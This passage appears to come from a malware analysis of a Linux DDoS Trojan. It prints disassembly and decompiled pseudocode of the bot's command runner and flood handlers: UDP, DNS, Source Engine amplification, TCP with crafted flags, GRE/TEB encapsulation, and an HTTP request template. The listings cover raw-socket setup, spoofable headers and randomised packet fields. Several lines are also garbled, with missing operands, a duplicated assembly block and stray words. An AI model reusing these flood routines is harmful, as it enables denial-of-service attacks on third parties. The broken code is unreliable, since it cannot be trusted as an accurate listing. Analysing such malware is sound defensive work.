.text:0804B978 cmp dl, bl
.text:0804B97A jnz short next_entry
Then child processes are run:
pid_children = fork(); //parent
if ( pid_children <= 0 ) {
if ( !pid_children ){
pid_2 = fork();
if ( pid_2 > 0 )
exit(0); //child die, so parent returns to command execution
if ( !pid_2){
v6 = fork();
if ( !v6 ){
handlers.handlers[v7].func(target_count, targets, params_count, params); // run command
if ( v6 > 0 ){
kill(v6, 9); //kills his child after $time seconds
}else{//parent waiting for children death
LOBYTE(v6) = __libc_waitpid(pid_children, &status, 0);
Command handlers
.text:08048190 cmd15 proc near ; CODE XREF: cmd15j
.text:08048190 ; DATA XREF: fillCmdHandlers+27Ao
.text:08048190 jmp short cmd15
.text:08048190 cmd15 endp
.text:08048190 ; ---------------------------------------------------------------------------
.text:08048192 align 10h
.text:080481A0 ; =============== S U B R O U T I N E =======================================
.text:080481A0 ; Attributes: noreturn
.text:080481A0 cmd16 proc near ; CODE XREF: cmd16j
.text:080481A0 ; DATA XREF: fillCmdHandlers+2B4o
.text:080481A0 jmp short cmd16
.text:080481A0 cmd16 endp
.text:080481A0 ; ---------------------------------------------------------------------------
.text:080481A2 align 10h
.text:080481B0 ; =============== S U B R O U T I N E =======================================
.text:080481B0 ; Attributes: noreturn
.text:080481B0 cmd17 proc near ; CODE XREF: cmd17j
.text:080481B0 ; DATA XREF: fillCmdHandlers+2EBo
.text:080481B0 jmp short cmd17
.text:080481B0 cmd17 endp
Other handlers act as follows:
void handle(target *t, param *p){
the Trojan receives packet parameters
a packet is created for every target
yet 1 {
for every target
if (maskbits <= 31), a new target IP is selected
packet is being sent
cmd0 - UDP Flood
First, the parameters received are parsed:
v23 = calloc(target_count, 4u);
TOS = getNumberOrDefault(params_count, params, 2, 0);
ident = getNumberOrDefault(params_count, params, 3, 0xFFFF);
TTL = getNumberOrDefault(params_count, params, 4, 64);
fragmentation = getNumberOrDefault(params_count, params, 5, 0);
sport = getNumberOrDefault(params_count, params, 6, 0xFFFF);
dport = getNumberOrDefault(params_count, params, 7, 0xFFFF);
packetSize = getNumberOrDefault(params_count, params, 0, 512);
needFillRandom = getNumberOrDefault(params_count, params, 1, 1);
The getNumberOrDefault function has the following structure:
int __cdecl getNumberOrDefault(unsigned __int8 length, param2 *param, char id, int default)
It returns the value from the parameter array with the specified id or the value default if the id is not found. Values for the id field:
Id | value |
0 | It is changed depending on the handler and implies either the length of the whole packet or the length of the data. |
1 | For some types of attacks, it determines whether random data needs to be generated in the packet |
2 | ip_header.TOS |
3 | ip_header.identification |
4 | ip_header.TTL |
5 | ip_header.flags << 13 | ip_header.fragment |
6 | source port |
7 | dest port |
8 | Host in the DNS request |
9 | DNS request parameters |
11 | TCP.urgent_flag |
12 | TCP.ack_flag |
13 | TCP.psh_flag |
14 | TCP.rst_flag |
15 | TCP.syn_flag |
16 | TCP.fin_flag |
17 | TCP.Sequence_number |
19 | Specifies whether ip.dstAddr in the GRE packet is the same as in the external packet. |
20 | Requested page |
22 | The host header value |
Then the Trojan creates a “raw” socket and enters the IP header:
.text:0804AB7F push IPPROTO_UDP
.text:0804AB81 push SOCK_RAW
.text:0804AB83 push AF_INET
.text:0804AB85 call ___GI_socket
.text:0804AB8A mov [esp+6Ch+fd], eax
.text:0804AB8E add esp, 10h
.text:0804AB91 inc eax
.text:0804AB92 jz loc_804AE5E
.text:0804AB98 mov [esp+5Ch+var_14], 1
.text:0804ABA0 sub esp, 0Ch
.text:0804ABA3 push 4
.text:0804ABA5 lea eax, [esp+6Ch+var_14]
.text:0804ABA9 push eax
.text:0804ABAA push IP_HDRINCL
.text:0804ABAC push SOL_IP
.text:0804ABAE mov ebx, [esp+78h+fd]
.text:0804ABB2 push ebx
.text:0804ABB3 call ___GI_setsockopt
After that, it is generated using the header of a IP/UDP datagram for each objective received:
do {
target_packet_headers[v4] = calloc(0x5E6u, 1u); current_ipudp_header = target_packet_headers[counter];
current_ipudp_header->header.ip.Version = 69;
current_ipudp_header->header.ip.TOS = TOS;
v6 = htons(packetSize + 28, 8);
current_ipudp_header->header.ip.totalLength = v6;
current_ipudp_header->header.ip.TTL = TTL;
v7 = htons(ident, 8);
current_ipudp_header->header.ip.ident = v7;
if ( fragmentation )
current_ipudp_header->header.ip.frag_offs = 64;
current_ipudp_header->header.ip.protocol = IPPROTO_UDP;
current_ipudp_header->header.ip.src_addr = selfaddr;
current_ipudp_header->header.ip.dst_addr = targets[counter].target_ip;
v9 = __ROR2__(sport, 8);
current_ipudp_header-> = v9;
v10 = __ROR2__(dport, 8);
current_ipudp_header->header.udp.dport = v10;
v11 = __ROR2__(packetSize + 8, 8);
current_ipudp_header->header.udp.length = v11;
}while ( target_count > counter );
Then packets are sent to specified targets. If maskbits <= 31, a random target is generated. If the parameter values ident, dport, and sport equal 0xffff, these parameters are generated randomly for every packet. If a certain parameter is set, a packet’s body will be generated:
text:0804ADF3 rand_indent: ; CODE XREF: cmd0_udp_random+233j
.text:0804ADF3 call rand_cmwc
.text:0804ADF8 cmp [esp+5Ch+sourcePort], 0FFFFh
.text:0804ADFE mov [esi+ipudp_0.header._ip.ident], ax
.text:0804AE02 jnz sport_is_const
.text:0804AE08 rand_sport: ; CODE XREF: cmd0_udp_random+23Fj
.text:0804AE08 call rand_cmwc
.text:0804AE0D cmp [esp+5Ch+destPort], 0FFFFh
.text:0804AE13 mov [], ax
.text:0804AE17 jnz dport_is_const
.text:0804AE1D rand_dport: ; CODE XREF: cmd0_udp_random+24Bj
.text:0804AE1D call rand_cmwc
.text:0804AE22 cmp [esp+5Ch+needFillRandom], 0
.text:0804AE27 mov [edi+udp_packet.dport], ax
.text:0804AE2B jz send_packet
.text:0804AE31 loc_804AE31: ; CODE XREF: cmd0_udp_random+256j
.text:0804AE31 push eax
.text:0804AE32 push eax
.text:0804AE33 mov eax, dword ptr [esp+64h+size_of_packet]
.text:0804AE37 and eax, 0FFFFh
.text:0804AE3C push eax ; a2
.text:0804AE31 loc_804AE31: ; CODE XREF: cmd0_udp_random+256j
.text:0804AE31 push eax
.text:0804AE32 push eax
.text:0804AE33 mov eax, dword ptr [esp+64h+size_of_packet]
.text:0804AE37 and eax, 0FFFFh
.text:0804AE3C push eax ; a2
.text:0804AE3D lea eax, []
.text:0804AE40 push eax ; a1
.text:0804AE41 call fillBufRandom
.text:0804AE46 add esp, 10h
.text:0804AE49 jmp send_packet
Then the Trojan counts checksums and shifts its attention to the next target. This procedure continues until the process is terminated:
.text:0804AD1C send_packet: ; CODE XREF: cmd0_udp_random+36Bj
.text:0804AD1C ; cmd0_udp_random+389j
.text:0804AD1C mov word ptr [esi+0Ah], 0
.text:0804AD22 push eax
.text:0804AD23 push eax
.text:0804AD24 push 14h
.text:0804AD26 push esi
.text:0804AD27 call calcIPCheckSum
.text:0804AD2C mov [esi+0Ah], ax
.text:0804AD30 mov word ptr [edi+6], 0
.text:0804AD36 push ebx ; a4
.text:0804AD37 mov ax, [edi+4]
.text:0804AD3B and eax, 0FFFFh
.text:0804AD40 push eax ; a3
.text:0804AD41 push edi ; a2
.text:0804AD42 push esi ; a1
.text:0804AD43 call calcUDPChecksum
.text:0804AD48 mov [edi+6], ax
.text:0804AD4C mov eax, [esp+7Ch+counter]
.text:0804AD50 mov ecx, [esp+7Ch+targets]
.text:0804AD57 mov dx, [edi+2]
.text:0804AD5B lea eax, [eax+eax*2]
.text:0804AD5E add esp, 18h
.text:0804AD61 shl eax, 3
.text:0804AD64 mov [eax+ecx+0Ah], dx
.text:0804AD69 lea eax, [ecx+eax+8]
.text:0804AD6D push 10h
.text:0804AD6F push eax
.text:0804AD70 push 4000h
.text:0804AD75 push ebp
.text:0804AD76 push esi
.text:0804AD77 mov esi, [esp+78h+fd]
.text:0804AD7B push esi
.text:0804AD7C call ___libc_sendto
.text:0804AD81 mov eax, [esp+7Ch+counter]
.text:0804AD85 inc eax
.text:0804AD86 mov [esp+7Ch+counter], eax
.text:0804AD8A add esp, 20h
.text:0804AD8D cmp eax, [esp+5Ch+target_count_2]
.text:0804AD91 jl send_to_next_target
.text:0804AD97 mov ecx, [esp+5Ch+target_count_2]
.text:0804AD9B test ecx, ecx
.text:0804AD9D jmp and_again
cmd1 - Source Engine Amplification
It operates like the previous command; however, the packet’s content is retrieved from the configuration:
TOS = getNumberOrDefault(params_count, params, 2, 0);
ident = getNumberOrDefault(params_count, params, 3, 0xFFFF);
TTL = getNumberOrDefault(params_count, params, 4, 64);
frag = getNumberOrDefault(params_count, params, 5, 0);
sport = getNumberOrDefault(params_count, params, 6, 0xFFFF);
dport = getNumberOrDefault(params_count, params, 7, 27015); //constant by default
tsource = (char *)get_data_from_config(8); // get "TSource Engine Query"
cmd2 - DNS flood
This command uses parameters similar to the previous ones; however, in this case, the value transaction_id and the domain name that needs to be requested are added for the DNS packet:
TOS = getNumberOrDefault(params_count, params, 2, 0);
ident = getNumberOrDefault(params_count, params, 3, 0xFFFF);
TTL = getNumberOrDefault(params_count, params, 4, 64);
frag = getNumberOrDefault(params_count, params, 5, 0);
sport = getNumberOrDefault(params_count, params, 6, 0xFFFF);
dport = getNumberOrDefault(params_count, params, 7, 53);
transaction_id_1 = getNumberOrDefault(params_count, params, 9, 0xFFFF);
random_data_length = getNumberOrDefault(params_count, params, 0, 12);
query = getString(params_count, params, 8, 0);
A packet containing 100 domain requests is generated and sent to the specified address. The Recursion desired flag is set:
.text:0804A4D3 mov [ecx+dnsheader.flags], 1 ; Do request reqursively
.text:0804A4D9 mov [ecx+dnsheader.qdcount], 100h ; One Request
.text:0804A4DF mov [edx+ipudp_2.queries], al ; size of random generated
.text:0804A4E2 mov ecx, [esp+6Ch+random_data_length]
.text:0804A4E6 push eax
.text:0804A4E7 mov eax, [esp+70h+length_of_domain]
.text:0804A4EB push eax ; a3
.text:0804A4EC lea ebx, [edx+ecx+(ipudp_2.queries+1)]
.text:0804A4F0 mov eax, [esp+74h+domain_query]
.text:0804A4F4 push eax ; a2
.text:0804A4F5 lea eax, [ebx+1]
.text:0804A4F8 push eax ; a1
.text:0804A4F9 call strncpy
.text:0804A4FE add esp, 10h
.text:0804A501 mov esi, [esp+6Ch+length_of_str]
.text:0804A505 test esi, esi
.text:0804A507 jle loc_804A71E
.text:0804A50D mov edx, ebx
.text:0804A50F xor ecx, ecx
.text:0804A511 mov eax, 1
.text:0804A516 jmp short check_char_in_query
.text:0804A518 ; ---------------------------------------------------------------------------
.text:0804A518 not_dot: ; CODE XREF: cmd2_dns_flood+29Dj
.text:0804A518 inc ecx ; parsing query
.text:0804A519 not_very_efficient_loop: ; CODE XREF: cmd2_dns_flood+2A6j
.text:0804A519 inc eax
.text:0804A51A cmp eax, [esp+6Ch+random_data_length]
.text:0804A51E jz loc_804A6E9
.text:0804A524 check_char_in_query: ; CODE XREF: cmd2_dns_flood+286j
.text:0804A524 mov esi, [esp+6Ch+domain_query]
.text:0804A528 cmp byte ptr [eax+esi-1], '.'
.text:0804A52D jnz short not_dot ; parsing query
.text:0804A52F mov [edx], cl
.text:0804A531 lea edx, [ebx+eax]
.text:0804A534 xor ecx, ecx
.text:0804A536 jmp short not_very_efficient_loop
A name of a requested host is generated by setting a length of a generated prefix in the field 0, to which a string, transmitted in the parameter with id = 8, is added.
cmd3 - TCP flood 2 options
The command is responsible for sending TCP packets to specified targets. It also allows values to be specified for TCP flags using these parameters:
TOS = getNumberOrDefault(params_count, params, 2, 0);
ident = getNumberOrDefault(params_count, params, 3, 0xFFFF);
TTL = getNumberOrDefault(params_count, params, 4, 64);
frag = getNumberOrDefault(params_count, params, 5, 1);
sport = getNumberOrDefault(params_count, params, 6, 0xFFFF);
dport = getNumberOrDefault(params_count, params, 7, 0xFFFF);
seq = getNumberOrDefault(params_count, params, 17, 0xFFFF);
v32 = getNumberOrDefault(params_count, params, 18, 0);
urgent_flag = getNumberOrDefault(params_count, params, 11, 0);
ack_flag = getNumberOrDefault(params_count, params, 12, 0);
psh_flag = getNumberOrDefault(params_count, params, 13, 0);
rst_flag = getNumberOrDefault(params_count, params, 14, 0);
syn_flag = getNumberOrDefault(params_count, params, 15, 1);
fin_flag = getNumberOrDefault(params_count, params, 16, 0);
Setting flags in the packet:
.text:0804A016 mov [esi+tcp_packet.seq], eax
.text:0804A019 mov al, byte ptr [esi+tcp_packet.flags]
.text:0804A01C and eax, 0Fh
.text:0804A01F or eax, 0FFFFFFA0h ; set packet size as 10 dwords (40 bytes)
.text:0804A022 mov byte ptr [esi+tcp_packet.flags], al
.text:0804A025 mov al, byte ptr [esi+(tcp_packet.flags+1)]
.text:0804A028 and eax, 0FFFFFFCFh ; 0x11001111
.text:0804A02B mov dl, [esp+6Ch+ack_flg]
.text:0804A02F or al, [esp+6Ch+urgent_flg_shifted]
.text:0804A033 mov cl, [esp+6Ch+push_flag]
.text:0804A037 shl edx, 4
.text:0804A03A shl ecx, 3
.text:0804A03D or eax, edx
.text:0804A03F and eax, 0FFFFFFF3h ; 0x11110011
.text:0804A042 mov dl, [esp+6Ch+rst_flg]
.text:0804A046 shl edx, 2
.text:0804A049 or eax, ecx
.text:0804A04B or eax, edx
.text:0804A04D mov dl, [esp+6Ch+syn_flag]
.text:0804A051 add edx, edx
.text:0804A053 and eax, 0FFFFFFFCh
.text:0804A056 or eax, edx
.text:0804A058 or eax, edi
.text:0804A05A mov byte ptr [esi+(tcp_packet.flags+1)], al
In addition, TCP parameters containing the numbers 2 and 8 are installed in the packet—maximum segment size and timestamp:
.text:0804A05D mov byte ptr [ebx+28h], TCPOPT_MAXSEG
.text:0804A061 mov byte ptr [ebx+29h], 4
.text:0804A065 call rand_cmwc
.text:0804A06A mov byte ptr [ebx+2Ch], 4
.text:0804A06E and eax, 0Fh
.text:0804A071 mov byte ptr [ebx+2Dh], 2
.text:0804A075 add eax, 578h
.text:0804A07A mov byte ptr [ebx+2Eh], TCPOPT_TIMESTAMP
.text:0804A07E ror ax, 8
.text:0804A082 mov byte ptr [ebx+2Fh], 0Ah
.text:0804A086 mov [ebx+2Ah], ax
.text:0804A08A call rand_cmwc
.text:0804A08F mov dword ptr [ebx+34h], 0
.text:0804A096 mov [ebx+30h], eax
.text:0804A099 mov byte ptr [ebx+38h], 1
.text:0804A09D mov byte ptr [ebx+39h], 3
.text:0804A0A1 mov byte ptr [ebx+3Ah], 3
.text:0804A0A5 mov byte ptr [ebx+3Bh], 6
Once generated, the packet is sent without any information.
cmd4 – TCP flood random
This command operates like the previous one; however, the TCP parameters are not set in the packet. If the corresponding flag is set, random data is written to the packet.
cmd6 - TCP flood 1 option
The command is similar to cmd3; however, only one parameter is set:
.text:08049656 mov byte ptr [], TCPOPT_NOP
.text:0804965A mov byte ptr [esi+(], TCPOPT_NOP
.text:0804965E mov byte ptr [esi+2Ah], TCPOPT_TIMESTAMP
.text:08049662 mov byte ptr [esi+2Bh], 0Ah
.text:08049666 lea ebx, [esi+2Ch]
.text:08049669 call rand_cmwc
.text:0804966E mov [esi+2Ch], eax
.text:08049671 call rand_cmwc
.text:08049676 mov [ebx+4], eax
cmd7 - TCP flood simple
In contrast to the previous methods, when this command is executed, only the port and the size of the transmitted data are defined. To carry out an attack, sockets are used to establish a TCP connection:
port = getNumberOrDefault(params_count, params, 7, 80);
size = getNumberOrDefault(params_count, params, 0, 1024);
useRandom = getNumberOrDefault(params_count, params, 1, 1);
cmd8 UDP flood over GRE
The command sends UDP packets over the GRE protocol and uses the following parameters:
TOS = getNumberOrDefault(params_count, param, 2, 0);
ident = getNumberOrDefault(params_count, param, 3, 0xFFFF);
TTL = getNumberOrDefault(params_count, param, 4, 64);
frag = getNumberOrDefault(params_count, param, 5, 1);
sport = getNumberOrDefault(params_count, param, 6, 0xFFFF);
dport = getNumberOrDefault(params_count, param, 7, 0xFFFF);
payloadLength = getNumberOrDefault(params_count, param, 0, 512);
fillRandom = getNumberOrDefault(params_count, param, 1, 1);
useSameAddr = getNumberOrDefault(params_count, param, 19, 0); //inner ip.dstAddr == outer ip.dstAddr
The GRE packet is generated as follows:
.text:08048F57 loc_8048F57: ; CODE XREF: cmd8_GRE_udp_random+1EFj
.text:08048F57 mov [ebx+ipgre8._ip.protocol], IPPROTO_GRE
.text:08048F5B mov [edx+gre_packet.protocolType], 8 ; IP protocol
.text:08048F61 mov eax, ds:selfaddr
.text:08048F66 mov ecx, [esp+5Ch+arg_4]
.text:08048F6A mov [ebx+ipgre8._ip.src_addr], eax
.text:08048F6D mov eax, [esp+5Ch+counter]
.text:08048F71 lea eax, [eax+eax*2]
.text:08048F74 mov eax, [ecx+eax*8]
.text:08048F77 mov [ebx+ipgre8.ip_inner.header._ip.Version], 45h
.text:08048F7B mov [ebx+ipgre8._ip.dst_addr], eax
.text:08048F7E mov al, [esp+5Ch+TOS]
.text:08048F82 mov [esi+ipudp._ip.TOS], al
.text:08048F85 mov dl, [esp+5Ch+TTL]
.text:08048F89 mov eax, dword ptr [esp+5Ch+inner_length]
.text:08048F8D ror ax, 8
.text:08048F91 mov [esi+ipudp._ip.totalLength], ax
.text:08048F95 mov ax, [esp+5Ch+ident_inner]
.text:08048F9A mov [esi+ipudp._ip.TTL], dl
.text:08048F9D ror ax, 8
.text:08048FA1 cmp [esp+5Ch+frag], 0
.text:08048FA6 mov [esi+ipudp._ip.ident], ax
.text:08048FAA jz short loc_8048FB2
.text:08048FAC mov [esi+ipudp._ip.frag_offs], 40h
.text:08048FB2 loc_8048FB2: ; CODE XREF: cmd8_GRE_udp_random+24Aj
.text:08048FB2 mov [esi+ipudp._ip.protocol], IPPROTO_UDP
.text:08048FB6 call rand_cmwc
.text:08048FBB cmp [esp+5Ch+var_27], 0
.text:08048FC0 mov [esi+ipudp._ip.src_addr], eax
.text:08048FC3 jnz use_same
.text:08048FC9 sub eax, 400h
.text:08048FCE xor eax, 0FFFFFFFFh
.text:08048FD1 mov [esi+ipgre8._ip.dst_addr], eax
.text:08048FD4 jmp loc_8048EC3
cmd10 GRE Packet using Transparent Ethernet Bridging
Like the previous command, this command sends encapsulated GRE packets; however, TEB (Transparent Ethernet Bridging) is used: the packet contains a full-featured Ethernet frame. The sender’s and the receiver's MAC addresses are randomly generated in the internal frame:
.text:08048A3A mov [ebx+ipgre_9.outer_iphdr._ip.protocol], IPPROTO_GRE
.text:08048A3E mov [ecx+gre_packet.protocolType], 5865h ; GRE_NET_TEB
.text:08048A44 mov eax, ds:selfaddr
.text:08048A49 mov edx, [esp+6Ch+arg_4]
.text:08048A4D mov [ebx+ipgre_9.outer_iphdr._ip.src_addr], eax
.text:08048A50 mov ecx, [esp+6Ch+saved_frame]
.text:08048A54 mov eax, [esp+6Ch+counter]
.text:08048A58 mov [ecx+ether_packet.type], 8 ; IP
cmd14 HTTP Flood
During one iteration, the command sends 10 HTTP requests that look as follows:
GET <param(20)> HTTP/1.1
Host: <param(22)>
Connection: keep-alive
User-Agent: <randomly selected from those specified in the configuration>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8